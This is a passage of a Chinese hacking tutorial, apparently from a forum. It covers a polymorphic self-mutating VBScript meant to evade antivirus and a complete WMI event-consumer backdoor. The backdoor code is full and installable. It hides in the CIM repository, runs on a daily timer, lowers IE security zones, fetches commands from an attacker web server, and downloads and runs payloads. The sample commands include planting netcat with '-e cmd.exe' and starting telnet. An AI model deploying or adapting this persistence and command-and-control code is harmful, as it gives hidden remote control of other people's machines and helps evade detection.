A001="wscript.echo ""OK!"":A004=chr(34):randomize:A005=int(rnd*24000+40960):A001=A006(A001):A000=A005 mod 10+2:A001=replace(A002,A004,A004&A004):set A007=createobject(""ADODB.Stream""):A007.open:A007.writetext hex(A005+1)&""=""&A004&A001&A004&A008("":execute ""&A004&A006(""A000=""&A000&"":A001=A002:execute A001:function A002():for A003=1 to len(A001) step A000:A002=A002+strreverse(mid(A001,A003,A000)):next:end function"")&A004):A007.savetofile wscript.scriptfullname,2:function A006(A009):for A00A=0 to 12:A009=replace(A009,hex(&HA000+A00A),hex(A005+A00A)):next:A006=A009:end function:function A008(A009):for A00A=1 to len(A009):A00B=mid(A009,A00A,1):if int(rnd*2-1) then A00B=ucase(A00B):end if:if A00A>11 and int(rnd*5)=0 then A008=A008&A004&chr(38+int(rnd*2)*5)&A004:end if:A008=A008&A00B:next:end function":A000=1:A001=A002:execute A001:function A002():for A003=1 to len(A001) step A000:A002=A002+strreverse(mid(A001,A003,A000)):next:end function

（注意，其中沒有回車符）

上面是“原版”的，保存為vbs文件雙擊運(yùn)行，還是彈出對話框顯示"OK!"。再看代碼變形成什么樣了(效果是隨機(jī)的)：
Codz:
B906="tpircsw"" ohce.9B:""!KO(rhc=90nar:)43:ezimodni=A09B2*dnr(t04+00049B:)069B09B=60:)609B(9B=509B dom A09B:2+01lper=6009B(eca,909B,79B&909Btes:)90c=C09B boetaerA""(tcejtS.BDOD:)""maerpo.C09BC09B:netetirw.xeh txe1+A09B(B&""=""&)09B&909&909B&6:""(D09Betucexe909B&"" ""(B09B&&""=509B:""&509B9B=609Bcexe:709B etucnuf:609B noitof:)(70=809B rel ot 1)609B(nB pets 09B:509+709B=7everrtsdim(esrB,609B(09B,809xen:))5f dne:tnoitcnu909B&)"".C09B:)fotevascsw elics.tpirluftpir2,emanlitcnuf:B09B no:)E09B(09B rof ot 0=FE09B:21calper=,E09B(eBH&(xeh09B+509(xeh,)F9B+A09Ben:))F0B09B:txe:E09B=cnuf dnuf:noit noitcn9B(D09Brof:)E01=F09B nel ot :)E09B(im=019B,E09B(d)1,F09Btni fi:-2*dnr(neht )1u=019B 9B(esacdne:)01 fi:fi 11>F09Bni dna 5*dnr(teht 0=)=D09B n9B&D09B(rhc&90(tni+83*)2*dnr909B&)5fi dne:B=D09B:19B&D09:txen:0nuf dnenoitc":EXecUTe "B9"&"05=7"&":B906"&"=B907:E"+"XEc"+"utE B906"+":FuN"&"ctIoN B9"&"07():fOr"+" B9"+"08=1 tO l"&"En(B906)"+" step B905:B907"&"=B907+"&"sTRreVErSe(MId("&"B9"&"0"&"6,B908,B905"&")"+"):N"+"eX"+"t"+":eNd fUN"&"CtiOn"

眼花了沒？再來一次：
Codz:
F0CB="rcsw.tpiohceKO"" F:""!=EC0(rhc:)43dnarzimo0F:ei=FCr(tn2*dn0004904+:)06BC0FD0F=0F(0:)BCAC0FC0F=om F01 dF:2+=BC0lper(ecaCC0FC0F,0F,EF&EC)EC0tes:D0F rc=1etaeejbo""(tcDODAtS.BmaerF:)"".1D0nepoD0F:rw.1teti txe(xehFC0F&)1+&""=""EC0FC0F&0F&BF&EC(2D0xe:""tuce&"" eEC0FD0F&F""(0=AC00F&""""&ACC0F:0F=Be:CCucex etBC0Fnuf:oitc0F n)(CCrof:C0F 1=Dl otF(ne)BC0ets 0F pF:AC=CC0CC0Frts+ever(esr(dimBC0FC0F,0F,D))ACxen:ne:tuf ditcn)""noC0F&F:)E.1D0evasifotw elircss.tppircluftmanl:2,ecnufnoitD0F 0F(0:)3D rof4D0Ft 0=21 oD0F:er=3calp0F(eh,3D&(xeC0FH0F+A,)4D(xehFC0FD0F+:))4txenD0F:0F=0e:3Df dntcnu:noicnufnoitD0F 0F(2:)3D rof4D0Ft 1=el o0F(n:)3D5D0Fdim=D0F(0F,31,4Dfi:)tni dnr(1-2*ht )F ne=5D0sacu0F(e:)5D dnei:fi0F f1>4Dna 1ni dnr(t)5*dt 0= neh2D0FD0F=0F&2c&EC3(rhni+8nr(t)2*d&)5*EC0Fdne::fi 2D0FD0F=0F&2n:5D:txe dnecnufnoit":eXecUtE "F"+"0CA"&"=4:F0CB"+"="+"F0CC:eX"+"e"+"cUte F0CB"&":F"+"UNC"+"tIOn F0CC():F"+"or"+" F0"&"CD=1 tO LEN(F0CB) sTEp F0CA:F0CC=F0CC+strR"+"Ever"+"SE"&"(mID("+"F0CB,"+"F0CD,F0CA)):nEXT:eNd FU"&"nCTIo"&"N"

這樣夠了嗎？——不知道。也許殺毒引擎本來就是忽略大小寫的，本來就能自動連接字符串，本來就能“文法分析”……
這個(gè)“殼”有實(shí)用性嗎？——沒有。因?yàn)椤皻ぁ钡乃惴ㄌ唵巍！胺N子”A000 = A005 mod 10 + 2，所以如果不考慮自動改變的變量名，加殼后的代碼只有10種樣子。
如何改進(jìn)這個(gè)“殼”？——當(dāng)然是用更復(fù)雜的算法，更多的“多態(tài)”。

如果你有興趣，可以先看那個(gè)“原版”的腳本代碼（把冒號都替換為回車，可讀性就比較好了），然后自己加強(qiáng)它。
當(dāng)然，你也可以另起爐灶，自由展現(xiàn)你的創(chuàng)意。

【來做個(gè)后門】
在討論腳本后門前，先要介紹一類很有用的WMI對象。事實(shí)上，這才是本節(jié)的關(guān)鍵。腳本后門不過是它的一個(gè)應(yīng)用而已。

前面已經(jīng)說過，WMI是事件驅(qū)動的。整個(gè)事件處理機(jī)制分為四個(gè)部分：
1，事件生產(chǎn)者(provider)：負(fù)責(zé)產(chǎn)生事件。WMI包含大量的事件生產(chǎn)者。有性能計(jì)數(shù)器之類的具體的事件生產(chǎn)者，也有類、實(shí)例的創(chuàng)建、修改、刪除等通用的事件生產(chǎn)者。

2，事件過濾器(filter)：系統(tǒng)每時(shí)每刻都在產(chǎn)生大量的事件，通過自定義過濾器，腳本可以捕獲感興趣的事件進(jìn)行處理。

3，事件消費(fèi)者(consumer)：負(fù)責(zé)處理事件。它可以是可執(zhí)行程序、動態(tài)鏈接庫(dll，由WMI服務(wù)加載)或者腳本。

4，事件綁定(binding)：通過將過濾器和消費(fèi)者綁定，明確什么事件由什么消費(fèi)者負(fù)責(zé)處理。

事件消費(fèi)者可以分為臨時(shí)的和永久的兩類。臨時(shí)的事件消費(fèi)者只在其運(yùn)行期間關(guān)心特定事件并處理。永久消費(fèi)者作為類的實(shí)例注冊在WMI名字空間中，一直有效直到它被注銷。顯然，永久事件消費(fèi)者更具實(shí)用性。還是來看個(gè)例子：
Codz:
nslink="winmgmts:\.\root\cimv2:" '只需要本地連接，所以用這種語法，不用swbemlocator對象'

set asec=getobject(nslink&"ActiveScriptEventConsumer").spawninstance_ '創(chuàng)建“活動腳本事件消費(fèi)者”'
asec.name="stopped_spooler_restart_consumer" '定義消費(fèi)者的名字'
asec.scriptingengine="vbscript" '定義腳本語言(只能是vbscript)'
asec.scripttext="getobject(""winmgmts:win32_service='spooler'"").startservice" '腳本代碼'
set asecpath=asec.put_ '注冊消費(fèi)者，返回其鏈接'

set evtflt=getobject(nslink&"__EventFilter").spawninstance_ '創(chuàng)建事件過濾器'
evtflt.name="stopped_spooler_filter" '定義過濾器的名字'
qstr="select * from __instancemodificationevent within 5 " '每5秒查詢一次“實(shí)例修改事件”'
qstr=qstr&"where targetinstance isa ""win32_service"" and " '目標(biāo)實(shí)例的類是win32_service'
qstr=qstr&"targetinstance.name=""spooler"" " '實(shí)例名是spooler'
qstr=qstr&"and targetinstance.state=""stopped""" '實(shí)例的state屬性是stopped'
evtflt.query=qstr '定義查詢語句'
evtflt.querylanguage="wql" '定義查詢語言(只能是wql)'
set fltpath=evtflt.put_ '注冊過濾器，返回其鏈接'

set fcbnd=getobject(nslink&"__FilterToConsumerBinding").spawninstance_ '創(chuàng)建過濾器和消費(fèi)者的綁定'
fcbnd.consumer=asecpath.path '指定消費(fèi)者'
fcbnd.filter=fltpath.path '指定過濾器'
fcbnd.put_ '執(zhí)行綁定'

wscript.echo "安裝完成"

這個(gè)腳本的效果是：當(dāng)“后臺打印”服務(wù)(spooler)狀態(tài)改變?yōu)橥Ｖ箷r(shí)，消費(fèi)者將進(jìn)行處理——重啟spooler。
先net start spooler，然后net stop spooler。最多5秒鐘，spooler又會啟動。

直接運(yùn)行上面的腳本會出錯(cuò)，因?yàn)椤盎顒幽_本事件消費(fèi)者”(ActiveScriptEventConsumer ASEC)默認(rèn)沒有被安裝到root\cimv2名字空間。

用記事本打開%windir%\system32\wbem\scrcons.mof，將第一行“#pragma namespace ("\\.\Root\Default")”刪除，或者修改為“#pragma namespace ("\\.\Root\cimv2")”。XP/2003沒有這一行，不用修改。
然后執(zhí)行下面這個(gè)命令：

C:\WINNT\system32\wbem>mofcomp.exe -N:root\cimv2 scrcons.mof
Microsoft (R) 32-bit MOF 匯編器版本 1.50.1085.0007
版權(quán)所有 (c) Microsoft Corp. 1997-1999。保留所有權(quán)利。

正在分析 MOF 文件: scrcons.mof
MOF 文件分析成功
將數(shù)據(jù)儲存到儲備庫中...
已完成!

這樣就把ASEC安裝到root\cimv2了。mofcomp.exe和scrcons.mof都是系統(tǒng)自帶的。

2000默認(rèn)將ASEC安裝到root\default名字空間，而XP/2003默認(rèn)已經(jīng)安裝到root\subscription名字空間，但由于事件過濾器不能跨名字空間捕捉事件（XP/2003可以），事件綁定也不能跨名字空間，而大部分事件都在root\cimv2產(chǎn)生，所以需要重新安裝ASEC到事件源所在的名字空間。下面這個(gè)腳本自動完成ASEC重安裝任務(wù)。
Codz:
set shl=createobject("WScript.Shell")
set fso=createobject("Scripting.FileSystemObject")
path=shl.expandenvironmentstrings("%windir%\system32\wbem")
set mof=fso.opentextfile(path&"\scrcons.mof",1,false,-1) 'mof都是Unicode格式的'
mofs=mof.readall
mof.close
mofs=replace(mofs,"\Default","\cimv2",1,1) '替換默認(rèn)的名字空間'
mofp=path&"\asecimv2.mof"
set mof=fso.createtextfile(mofp,false,true) '創(chuàng)建臨時(shí)mof文件'
mof.write mofs
mof.close
shl.run path&"\mofcomp.exe -N:root\cimv2 "&mofp,0,true '安裝到root\cimv2'
fso.deletefile(mofp)
wscript.echo "安裝完成"

注銷永久事件：
Codz:
nslink="winmgmts:\.\root\cimv2:"
myconsumer="stopped_spooler_restart_consumer" '指定消費(fèi)者的名字'
myfilter="stopped_spooler_filter" '指定過濾器的名字'
set binds=getobject(nslink&"__FilterToConsumerBinding").instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
getobject("winmgmts:"&bind.consumer).delete_ '刪除消費(fèi)者'
getobject("winmgmts:"&bind.filter).delete_ '刪除過濾器'
bind.delete_ '刪除綁定'
exit for
end if
next
wscript.echo "卸載完成"

除了ASEC，WMI還提供其他永久事件消費(fèi)者，比如SMTPEventConsumer。當(dāng)系統(tǒng)出現(xiàn)異常時(shí)，可以通過它自動給管理員的信箱發(fā)信。WMITools里的WMI Event Registration用于創(chuàng)建、修改、刪除指定名字空間里的永久事件消費(fèi)者、事件過濾器和計(jì)時(shí)器事件源的實(shí)例，以及綁定或解除綁定它們。

關(guān)于事件處理機(jī)制的各個(gè)部分，在《WMI技術(shù)指南》里有詳細(xì)的講述，MSDN里當(dāng)然更全面。我就點(diǎn)到為止了。

（看累了吧，喝口水，休息一下 ^_^）

下面開始討論腳本后門。

WMI提供了兩個(gè)計(jì)時(shí)器：__AbsoluteTimerInstruction和__IntervalTimerInstruction，分別在指定的時(shí)刻和時(shí)間間隔產(chǎn)生事件，注冊一個(gè)過濾器來捕獲計(jì)時(shí)器事件，再和ASEC綁定，我們就獲得了一種少見的程序自啟動的方法。而且，腳本代碼完全隱藏在CIM存儲庫中，不以獨(dú)立的文件存在，查殺比較困難。這是腳本后門的優(yōu)勢，但困難也不少：

1，腳本運(yùn)行時(shí)，由系統(tǒng)自帶的scrcons.exe作為腳本宿主（Windows的設(shè)計(jì)者還沒有笨到用WMI服務(wù)作為腳本宿主）。這就會增加一個(gè)進(jìn)程，雖然是系統(tǒng)正常的進(jìn)程，殺毒軟件拿它沒轍，但還是太顯眼了。所以，不能讓腳本一直在后臺運(yùn)行，而是應(yīng)該每隔一段時(shí)間啟動一次，然后盡快結(jié)束。腳本結(jié)束后，scrcons.exe進(jìn)程不會自動結(jié)束，必須讓腳本借助WMI提供的Win32_Process對象主動終止宿主進(jìn)程（煮豆燃豆萁？?。?。

2，腳本的網(wǎng)絡(luò)功能很差，基本上只能依靠Microsoft.XMLHTTP之類的對象。因此，腳本后門不能監(jiān)聽端口并提供cmd shell，只能反向連接到web服務(wù)器，獲取控制命令。一個(gè)可行的辦法是，在web服務(wù)器上放一個(gè)命令文件，腳本后門根據(jù)域名找到服務(wù)器并下載命令文件，再根據(jù)文件內(nèi)容作出響應(yīng)。所以，你需要一臺web服務(wù)器，或者用netbox等工具建個(gè)臨時(shí)服務(wù)器。當(dāng)然，你不需要讓服務(wù)器總是在線，需要控制腳本后門時(shí)再運(yùn)行就可以了。

3，由于腳本后門間歇式運(yùn)行，需要防止重復(fù)運(yùn)行同一個(gè)命令。解決方法是在注冊表里記錄命令的長度，每次獲取命令后將長度和記錄做比較，如果相同則跳過，不同則覆蓋并執(zhí)行命令。

4，為了借助ie對象穿透防火墻，XMLHTTP對象必須在ie中被創(chuàng)建，這會受到Internet域安全級別的限制。即使將代碼保存在html文件中再用ie打開，也不過是“我的電腦”域，創(chuàng)建不安全的ActiveX對象還是會彈出警告對話框。解決辦法是修改注冊表，臨時(shí)更改安全設(shè)置。

5，WScript對象由wscript.exe或cscript.exe提供，而scrcons.exe沒有提供，所以很多常用的功能，比如WScript.Sleep都不能用了。不能Sleep就無法異步使用XMLHTTP，而同步XMLHTTP可能被長時(shí)間阻塞，大大不利于后門的隱蔽。調(diào)用ping命令來延時(shí)會創(chuàng)建新進(jìn)程，用WScript.Shell的Popup方法延時(shí)則有“咚”一聲提示音。好在Microsoft.XMLHTTP的“親戚”不少，比如Msxml2.XMLHTTP、Msxml2.ServerXMLHTTP、Msxml2.DOMDocument、WinHttp.WinHttpRequest等。最后那個(gè)可以設(shè)置超時(shí)時(shí)間，剛好滿足需要。

即使有重重困難，腳本后門仍然值得挑戰(zhàn)一下。當(dāng)肉雞上的各類木馬紛紛被殺毒軟件肅清后，一個(gè)24小時(shí)才運(yùn)行一次的腳本后門可能是你最后的希望。

下面是一個(gè)簡單的腳本后門的核心代碼（沒有安裝功能）：
Codz:
cmdu="http://myweb.8866.org/cmd.txt" '從web服務(wù)器獲取命令的url'
cmdw=4000 '下載超時(shí)時(shí)間4秒'
cmdl="HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\CmdLength" '記錄命令長度的鍵值名'

on error resume next '忽略非致命錯(cuò)誤 '(調(diào)試時(shí)注釋掉本行)
set shl=createobject("WScript.Shell") '雖然不能使用WScript根對象，其子對象還是可以用的'
set aso=createobject("ADODB.Stream")
set ie=createobject("InternetExplorer.Application") '使用ie繞過防火墻'

zone="HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
set1=zone&"01"
set2=zone&"00"
set3=zone&"\CurrentLevel"
val1=shl.regread(set1) '保存原來的安全設(shè)置'
val2=shl.regread(set2)
val3=shl.regread(set3)
regd="REG_DWORD"
shl.regwrite set1,0,regd '允許在Internet域運(yùn)行不安全的ActiveX'
shl.regwrite set2,0,regd '允許活動腳本'
shl.regwrite set3,0,regd '設(shè)置當(dāng)前Internet域安全級別為“自定義”'

ie.visible=0 ':ie.visible=1 '(調(diào)試用)
ie.navigate "about"&":blank" '這里使用字符串連接純屬反論壇過濾'
ie.document.write _
"<script>function whr(){return new ActiveXObject('WinHttp.WinHttpRequest.5.1')}</script>"
set whr=ie.document.script.whr() '在ie內(nèi)創(chuàng)建WinHttpRequest對象'

whr.settimeouts cmdw,cmdw,cmdw,cmdw '設(shè)置域名解析、連接、發(fā)送和接收超時(shí)時(shí)間'
whr.open "GET",cmdu,true '獲取命令文件'
whr.send
if not whr.waitforresponse(cmdw) then die
if whr.status>299 then die
rt=whr.responsetext ':wscript.echo rt '(調(diào)試用)
':shl.regwrite cmdl,0,regd '(調(diào)試用)
if len(rt)=shl.regread(cmdl) then die '與前一個(gè)命令的長度比較'
shl.regwrite cmdl,len(rt),regd '更新命令長度'
cmds=split(rt,vbcrlf,-1)
if ubound(cmds)<1 then die
cmdt=lcase(trim(cmds(0))) ':wscript.echo cmdt '(調(diào)試用)

aso.type=1
aso.open
cd=shl.currentdirectory&chr(92)
select case cmdt '分析命令文件類型'
case "'vbs" '是vbs'
execute(rt) '直接在當(dāng)前腳本上下文中執(zhí)行'
die
case ":bat" '是批處理'
aso.write whr.responsebody
aso.savetofile cd&"_.bat",2 '保存在當(dāng)前目錄'
aso.close
shl.run chr(34)&cd&"_.bat""",0 '運(yùn)行批處理'
die
case "'wsh" '是Windows腳本'
aso.write whr.responsebody
aso.savetofile cd&"_.vbs",2 '保存在當(dāng)前目錄'
aso.close
shl.run "cscript.exe """&cd&"_.vbs""",0 '使用cscript作為腳本宿主'
die
case "exe" 'exe需進(jìn)一步分析'
case else die
end select

if ubound(cmds)<4 then die ':wscript.echo cmds(1) '(調(diào)試用)
whr.open "GET",cmds(1),true '從指定位置下載exe文件'
whr.send
if not whr.waitforresponse(cmds(2)) then die
if whr.status>299 then die
path=shl.expandenvironmentstrings(cmds(3))'展開保存路徑中的環(huán)境變量'
aso.write whr.responsebody ':wscript.echo path '(調(diào)試用)
aso.savetofile path,2 '保存exe文件'
aso.close
shl.run chr(34)&path&""" "&cmds(4),0 '執(zhí)行exe'

die

sub die
ie.quit
shl.regwrite set1,val1,regd '還原Internet域安全設(shè)置'
shl.regwrite set2,val2,regd
shl.regwrite set3,val3,regd
for each ps in getobject("winmgmts:\.\root\cimv2:win32_process").instances_
if lcase(ps.name)="scrcons.exe" then ps.terminate '自殺'
next
'wscript.echo "die": wscript.quit '(調(diào)試用)
end sub

取消調(diào)試語句的注釋，上面這段核心代碼就可以直接運(yùn)行。
它將試圖從myweb.8866.org上獲取cmd.txt，根據(jù)里面的內(nèi)容進(jìn)一步行動。
cmd.txt看起來像這樣：
Codz:
exe //被執(zhí)行的文件類型，可以是'vbs、:bat、exe或wsh
http://myweb.8866.org/nc.exe //被執(zhí)行的文件的下載url
4000 //下載超時(shí)時(shí)間，單位毫秒
%windir%\system32\nc.exe //文件的保存位置，支持環(huán)境變量
-L -p 1234 -e cmd.exe //命令行參數(shù)

收到上面這個(gè)命令后，腳本將從指定url下載nc.exe，保存到系統(tǒng)目錄并運(yùn)行。

如果第一行的文件類型為'vbs、'wsh或:bat，則把命令文件本身當(dāng)作腳本或批處理來執(zhí)行。比如：
Codz:
:bat
net start telnet :啟動telnet服務(wù)
del %0 :自刪除

如果只是想讓某臺主機(jī)執(zhí)行命令，可以這樣：
Codz:
:bat
ipconfig | find "123.45.67.89" && net start telnet
del %0

這樣就只有ip地址為123.45.67.89的主機(jī)才會啟動telnet。

'wsh和'vbs的區(qū)別是，前者保存為文件由cscript.exe調(diào)用，后者直接在腳本后門“內(nèi)部”執(zhí)行。
使用'vbs的好處是不用生成文件，而且可以直接利用后門中已經(jīng)創(chuàng)建的對象，比如shl，但也因此不能用WScript根對象。

下面的'vbs命令文件把"本地帳戶的共享和安全模式"由"僅來賓"改為"經(jīng)典"（對XP和2003有效）：
Codz:
'vbs
shl.regwrite "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0,"REG_DWORD"

注意，vbs和wsh前面都有一個(gè)單引號，因?yàn)檎麄€(gè)命令文件都作為腳本執(zhí)行，所以必須注釋掉第一行，:bat也是一樣。
使用'vbs時(shí)千萬注意不要有語法錯(cuò)誤，否則會使后門出錯(cuò)并停止。如果是復(fù)雜的腳本，建議使用'wsh。

將核心代碼改寫為單行字符串格式，就可以作為ASEC的實(shí)例安裝了。改寫時(shí)要注意"if"和"end if"配對以及去掉續(xù)行符。
完整的安裝腳本代碼如下：
Codz:
'***以下為參數(shù)配置，請根據(jù)情況自行修改***'
nslink="winmgmts:\.\root\cimv2:" '名字空間'
doorname="vbscript_backdoor" '記住后門的名字，卸載時(shí)需要'
runinterval=86400000 '每天運(yùn)行一次'
cmdu="http://myweb.8866.org/cmd.txt" '命令文件的位置'
cmdw=4000 '文件下載超時(shí)時(shí)間'
cmdl="HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\CmdLength" '保存命令長度的鍵值名'
'***參數(shù)配置結(jié)束***'

createobject("WScript.Shell").regwrite cmdl,0,"REG_DWORD"

'腳本后門核心代碼'
stxt="cmdu="""&cmdu&""":cmdw="&cmdw&":cmdl="""&cmdl&""":on error resume next:set shl=createobject(""WScript.Shell""):set aso=createobject(""ADODB.Stream""):set ie=createobject(""InternetExplorer.Application""):zone=""HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"":set1=zone&""01"":set2=zone&""00"":set3=zone&""\CurrentLevel"":val1=shl.regread(set1):val2=shl.regread(set2):val3=shl.regread(set3):regd=""REG_DWORD"":shl.regwrite set1,0,regd:shl.regwrite set2,0,regd:shl.regwrite set3,0,regd:ie.visible=0:ie.navigate ""about""&"":blank"":ie.document.write ""<script>function whr(){return new ActiveXObject('WinHttp.WinHttpRequest.5.1')}</script>"":with ie.document.script.whr():.settimeouts cmdw,cmdw,cmdw,cmdw:.open ""GET"",cmdu,true:.send:if not .waitforresponse(cmdw) then die:end if:if .status>299 then die:end if:rt=.responsetext:if len(rt)=shl.regread(cmdl) then die:end if:shl.regwrite cmdl,len(rt),regd:cmds=split(rt,vbcrlf,-1):if ubound(cmds)<1 then die:end if:cmdt=lcase(trim(cmds(0))):aso.type=1:aso.open:cd=shl.currentdirectory&chr(92):select case cmdt:case ""'vbs"":execute(rt):die:case "":bat"":aso.write .responsebody:aso.savetofile cd&""_.bat"",2:aso.close:shl.run chr(34)&cd&""_.bat"""""",0:die:case ""'wsh"":aso.write .responsebody:aso.savetofile cd&""_.vbs"",2:aso.close:shl.run ""cscript.exe """"""&cd&""_.vbs"""""",0:die:case ""exe"":case else die:end select:if ubound(cmds)<4 then die:end if:.open ""GET"",cmds(1),true:.send:if not .waitforresponse(cmds(2)) then die:end if:if .status>299 then die:end if:path=shl.expandenvironmentstrings(cmds(3)):aso.write .responsebody:aso.savetofile path,2:aso.close:shl.run chr(34)&path&"""""" ""&cmds(4),0:end with:die:sub die:ie.quit:shl.regwrite set1,val1,regd:shl.regwrite set2,val2,regd:shl.regwrite set3,val3,regd:for each ps in getobject(""winmgmts:\.\root\cimv2:win32_process"").instances_:if lcase(ps.name)=""scrcons.exe"" then ps.terminate:end if:next:end sub"

'配置事件消費(fèi)者'
set asec=getobject(nslink&"ActiveScriptEventConsumer").spawninstance_
asec.name=doorname&"_consumer"
asec.scriptingengine="vbscript"
asec.scripttext=stxt
set asecpath=asec.put_

'配置計(jì)時(shí)器'
set itimer=getobject(nslink&"__IntervalTimerInstruction").spawninstance_
itimer.timerid=doorname&"_itimer"
itimer.intervalbetweenevents=runinterval
itimer.skipifpassed=false
itimer.put_

'配置事件過濾器'
set evtflt=getobject(nslink&"__EventFilter").spawninstance_
evtflt.name=doorname&"_filter"
evtflt.query="select * from __timerevent where timerid="""&doorname&"_itimer"""
evtflt.querylanguage="wql"
set fltpath=evtflt.put_

'綁定消費(fèi)者和過濾器'
set fcbnd=getobject(nslink&"__FilterToConsumerBinding").spawninstance_
fcbnd.consumer=asecpath.path
fcbnd.filter=fltpath.path
fcbnd.put_

wscript.echo "安裝完成"

與前一個(gè)永久事件處理過程不同的是，腳本后門的事件源是計(jì)時(shí)器，在每個(gè)名字空間都可以實(shí)例化并觸發(fā)事件。所以，不一定要將ASEC安裝到root\cimv2。特別是XP/2003，ASEC默認(rèn)已經(jīng)安裝到root\subscription，只需要相應(yīng)修改nslink的值，就可以安裝腳本后門了。

卸載腳本后門：
Codz:
cmdl="HKLM\SOFTWARE\Microsoft\WBEM\CIMOM\CmdLength"
createobject("WScript.Shell").regdelete cmdl '刪除保存命令長度的鍵值'
nslink="winmgmts:\.\root\cimv2:"
doorname="vbscript_backdoor" '根據(jù)腳本后門的名字找到各個(gè)對象實(shí)例'
myconsumer=doorname&"_consumer"
mytimer=doorname&"_itimer"
myfilter=doorname&"_filter"
set binds=getobject(nslink&"__FilterToConsumerBinding").instances_
for each bind in binds
if strcomp(right(bind.consumer,len(myconsumer)+1),myconsumer&chr(34),1)=0 _
and strcomp(right(bind.filter,len(myfilter)+1),myfilter&chr(34),1)=0 then
bind.delete_
exit for
end if
next
getobject(nslink&"ActiveScriptEventConsumer.Name="""&myconsumer&"""").delete_
getobject(nslink&"__IntervalTimerInstruction.TimerId="""&mytimer&"""").delete_
getobject(nslink&"__EventFilter.Name="""&myfilter&"""").delete_
wscript.echo "卸載完成"

幾點(diǎn)補(bǔ)充說明：
1，腳本后門的優(yōu)勢在于隱蔽，所以24小時(shí)才運(yùn)行一次是合適的。不用擔(dān)心因?yàn)橄到y(tǒng)關(guān)機(jī)而錯(cuò)過運(yùn)行機(jī)會，下次啟動時(shí)會補(bǔ)上的。

2，為了更好的反查殺，可以給腳本后門的核心代碼加殼。在功能上也可以改進(jìn)到接近IRC木馬的程度，只不過服務(wù)端是Web服務(wù)器，不能同時(shí)養(yǎng)太多的馬。

3，腳本后門的自啟動和運(yùn)行依賴于WMI服務(wù)，雖然禁用WMI服務(wù)就可以杜絕此類后門和木馬，但比起通過注冊表啟動還是可靠的多。如果被蠕蟲病毒利用，恐怕會很麻煩吧。

【結(jié)語】
Windows腳本就像萬能膠，能夠把獨(dú)立的程序、服務(wù)、控件組合起來完成任務(wù)。腳本編程的技巧就是組合的技巧。XP和2003比2000自帶更多的命令行工具，WMI也大大加強(qiáng)了，腳本的功能水漲船高，可以說是“只有想不到，沒有做不到”。一切有待你的發(fā)掘。

最后，感謝你耐心看完本文，希望本文可以為你學(xué)習(xí)Windows腳本提供一些幫助。

歡迎來信與我交流 zzzevazzz@126.com
歡迎訪問幻影旅團(tuán) http://www.ph4nt0m.org

【參考資料】
修訂一下下載地址，
1] 《Windows腳本技術(shù)》介紹Windows腳本的基礎(chǔ)知識
 http://download.microsoft.com/download/winscript56/Install/5.6/W982KMe/CN/scd56chs.exe

[2] WMITools 學(xué)習(xí)腳本必備，包括CIM Studio、Event Registration、Event Viewer和Object Browser四個(gè)工具
 http://download.microsoft.com/download/.NetStandardServer/Install/V1.1/NT5XP/EN-US/WMITools.exe

[3] 《WMI技術(shù)指南》出版社：機(jī)械工業(yè)出版社作者：Marcin Policht
http://www.huachu.com.cn/itbook/itbookinfo.asp?lbbh=BH99801035

[4] 《System Administration Scripting Guide》包含大量WMI腳本示例
 http://www.sometips.com/soft/script_repository.chm

[5] Script Encoder 官方腳本編碼工具
 http://download.microsoft.com/download/winscript56/Install/1.0/WIN98MeXP/CN/sce10chs.exe

[6] 微軟腳本中心
 http://www.microsoft.com/china/technet/community/scriptcenter/default.mspx

[7] 《MS Windows Script Host 2.0 Developers Guide》
http://www.sometips.com/soft/wsh.zip